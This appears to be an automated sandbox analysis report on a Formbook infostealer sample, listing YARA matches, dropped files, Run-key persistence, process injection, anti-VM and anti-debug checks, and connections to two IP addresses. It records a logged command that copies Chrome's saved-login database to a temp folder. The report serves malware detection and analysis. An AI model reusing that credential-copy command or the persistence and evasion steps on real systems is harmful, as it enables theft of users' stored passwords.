Source: 00000000.00000002.420259807.0000000002E97000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.416538189.0000000003247000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000002.00000002.416538189.0000000003247000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\tpmH.url, type: DROPPED	Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\tpmH.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\tpmH.url, type: DROPPED	Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/7@13/7

Source: C:\Users\user\Desktop\11-27.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe

Source: C:\Users\user\Desktop\11-27.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\11-27.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\11-27.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\11-27.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\11-27.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\11-27.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\11-27.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\11-27.exe 'C:\Users\user\Desktop\11-27.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: unknown	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V	Jump to behavior

Source:	Binary string: netstat.pdbGCTL source: 11-27.exe, 00000000.00000002.420907601.0000000003170000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000001.00000000.371534945.0000000007CA0000.00000002.00000001.sdmp
Source:	Binary string: msdt.pdbGCTL source: Hmptdrv.exe, 00000002.00000002.419969153.0000000005380000.00000040.00000001.sdmp
Source:	Binary string: netstat.pdb source: 11-27.exe, 00000000.00000002.420907601.0000000003170000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: 11-27.exe, 00000000.00000002.424540511.00000000055C0000.00000040.00000001.sdmp, Hmptdrv.exe, 00000002.00000002.420844920.00000000056FF000.00000040.00000001.sdmp, Hmptdrv.exe, 00000005.00000002.438727174.00000000056EF000.00000040.00000001.sdmp, msdt.exe, 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000007.00000002.415841954.0000000002DBF000.00000040.00000001.sdmp, svchost.exe, 0000000C.00000002.434695012.000000000371F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 11-27.exe, 00000000.00000002.424540511.00000000055C0000.00000040.00000001.sdmp, Hmptdrv.exe, 00000002.00000002.420844920.00000000056FF000.00000040.00000001.sdmp, Hmptdrv.exe, 00000005.00000002.438727174.00000000056EF000.00000040.00000001.sdmp, msdt.exe, NETSTAT.EXE, svchost.exe, 0000000C.00000002.434695012.000000000371F000.00000040.00000001.sdmp
Source:	Binary string: svchost.pdb source: Hmptdrv.exe, 00000005.00000003.426893413.0000000000844000.00000004.00000001.sdmp
Source:	Binary string: svchost.pdbUGP source: Hmptdrv.exe, 00000005.00000003.426893413.0000000000844000.00000004.00000001.sdmp
Source:	Binary string: msdt.pdb source: Hmptdrv.exe, 00000002.00000002.419969153.0000000005380000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000001.00000000.371534945.0000000007CA0000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_02239C23 push ebx; ret	0_3_02239C39
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C724 push esi; retf	0_3_0223C819
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C137 push esi; retf	0_3_0223C146
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223D536 push esi; retf	0_3_0223D537
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223B338 push esi; retf	0_3_0223B33C
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223943F push edi; ret	0_3_0223944C
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223D207 push esi; retf	0_3_0223D211
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223D607 push esi; retf	0_3_0223D615
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_02239E14 push ebx; ret	0_3_02239E16
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223D61B push esi; retf	0_3_0223D621
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C81F push esi; retf	0_3_0223C822
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223926C push esi; retf	0_3_02239272
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_02239A6C push esi; retf	0_3_02239A70
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223B178 push esi; retf	0_3_0223B1A8
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223997C push ebx; ret	0_3_02239987
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223D24E push esi; retf	0_3_0223D24F
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223D153 push esi; retf	0_3_0223D201
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C1A9 push esi; retf	0_3_0223C1EB
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223B0B3 push esi; retf	0_3_0223B16C
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223A7B0 push esi; retf	0_3_0223A7D8
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223B287 push esi; retf	0_3_0223B288
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223A392 push edi; iretd	0_3_0223A393
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223949D push ebx; ret	0_3_0223949F
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C49C push esi; retf	0_3_0223C4BC
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223B5E4 push esi; retf	0_3_0223B5E5
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_02239EE9 push ebx; ret	0_3_02239EEB
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C4EF push esi; retf	0_3_0223C4F1
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C2FC push esi; retf	0_3_0223C393
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C3C2 push esi; retf	0_3_0223C3CF
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C5D6 push esi; retf	0_3_0223C5FE
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_02B11AA4 push 00440316h; ret	0_3_02B11B02

Source: C:\Users\user\Desktop\11-27.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Hmpt			Jump to behavior
Source: C:\Users\user\Desktop\11-27.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Hmpt			Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\11-27.exe	RDTSC instruction interceptor: First address: 00000000030D34FC second address: 00000000030D3502 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11-27.exe	RDTSC instruction interceptor: First address: 00000000030D3776 second address: 00000000030D377C instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	RDTSC instruction interceptor: First address: 00000000051F662C second address: 00000000051F6632 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	RDTSC instruction interceptor: First address: 00000000051F68A6 second address: 00000000051F68AC instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 0000000002A998E4 second address: 0000000002A998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 0000000002A99B5E second address: 0000000002A99B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 00000000004598E4 second address: 00000000004598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 0000000000459B5E second address: 0000000000459B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 00000000030098E4 second address: 00000000030098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000003009B5E second address: 0000000003009B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: explorer.exe, 00000001.00000000.374736274.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000001.00000000.374075978.00000000083E0000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000001.00000000.365630880.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.363772887.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000001.00000000.374075978.00000000083E0000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.365630880.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 11-27.exe, 00000000.00000002.414500511.0000000000883000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.403982705.0000000000728000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428910857.00000000007DA000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.371869005.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000001.00000000.363772887.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000001.00000000.363772887.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000001.00000000.371869005.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000001.00000000.374736274.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000001.00000000.354990906.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 00000001.00000000.363772887.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\11-27.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\11-27.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\explorer.exe	Network Connect: 198.20.71.158 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 213.171.195.105 80			Jump to behavior

Source: C:\Users\user\Desktop\11-27.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\11-27.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
